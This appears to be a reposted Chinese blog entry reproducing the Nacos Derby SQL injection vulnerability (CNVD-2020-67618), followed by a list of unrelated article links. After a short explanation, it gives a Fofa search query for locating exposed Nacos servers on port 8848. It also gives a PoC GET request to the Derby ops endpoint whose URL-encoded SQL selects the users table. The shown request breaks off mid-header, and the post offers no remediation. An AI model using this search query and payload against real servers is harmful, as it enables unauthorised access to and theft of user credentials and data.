当前位置: 首页 > news >正文

【漏洞复现】Nacos Derby SQL注入漏洞

news 2024/11/15 7:08:59

Nacos Derby SQL注入漏洞

Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。

搜索语法:

Fofa-Query: ip.port=="8848" and title=="HTTP Status 404 – Not Found"

漏洞详情:

1.Nacos服务系统。

2.漏洞POC:

GET /nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73 HTTP/1.1
Host: {
{Hostname}}
User


http://www.mrgr.cn/news/29845.html

相关文章:

  • AI 大模型应用:AI开发的捷径工作流模式
  • 新日撸java三百行` 新手小白java学习记录 `Day1
  • ctfshow-web入门-SSTI(web361-web368)上
  • 3216. 交换后字典序最小的字符串
  • 刷错学校了—河工大oj 1051- 1072 做题笔记
  • SwiftUI开发教程系列 - 第十二章:本地化与多语言支持
  • Java中的语法糖:让编程更简洁的特性
  • 15. 三数之和(左右指针)
  • 【protobuf】ProtoBuf的学习与使用⸺C++
  • Springboot多种请求参数
  • 单细胞BCR的分析Dandelion重注释的安装以及用法----11111
  • java高频面试题(2024最新)
  • MySQL高阶1831-每天的最大交易
  • 视频转文字工具:开启视频内容深度挖掘的钥匙
  • Longman Dictionary of Contemporary English (朗文当代高级英语辞典)
  • [语言月赛 202408] 因友情而终结
  • linux网络编程2
  • Ansible——Playbook基本功能
  • 深入理解Go语言中的并发封闭与for-select循环模式
  • Spring 源码解读:手动实现Spring的资源管理机制
  • 大数相乘,大数相加
  • 上市公司-客户ESG数据集(dta+xlsx+参考文献)(2009-2023年)
  • 城市级河流三维处理及展示的一些技术
  • 【七篇文章从零速通transformer】01 从零开始解密神经网络:深度学习基础全解析
  • 数字IC设计\FPGA 职位经典笔试面试整理--语法篇 Verilog System Verilog(部分)
  • npm包管理工具